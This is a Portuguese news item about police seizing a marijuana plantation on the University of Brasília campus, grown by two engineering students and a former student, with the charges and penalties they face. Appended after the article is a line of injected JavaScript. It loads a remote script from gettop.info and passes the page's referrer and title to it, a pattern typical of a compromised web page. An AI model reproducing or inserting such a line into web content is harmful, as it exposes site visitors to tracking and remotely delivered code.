A Polícia Cívil do Distrito Federal apreendeu uma plantação de maconha nas dependências da Universidade de Brasília (UnB). Dois estudantes de engenharia e um ex-aluno, graduado em administração, cultivavam as plantas e acompanhavam o desenvolvimento através de fotos no celular.
Os jovens tinham 21, 22 e 29 anos. Um dos suspeitos tinha antecedente por posse de drogas e outro prestava concurso para oficial do Corpo de Bombeiros. A Coordenação de Repressão a Entorpecentes (Cord) afirmou que tinha um inquérito em aberto para investigar o crime.
A plantação, que tinha garrafas pet com água para regar as plantas, venenos para formigas e adubos, foi encontrada a cerca de 1,5 quilômetros da área de uso comum do Centro Olímpico. A Polícia Civil lavrou um Termo Circunstanciado por tráfico privilegiado e cultivo para consumo próprio.
As penas podem variar de 7 meses e 1 ano e 8 meses de detenção. Os autores foram liberados após se comprometerem a comparecer à Justiça.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;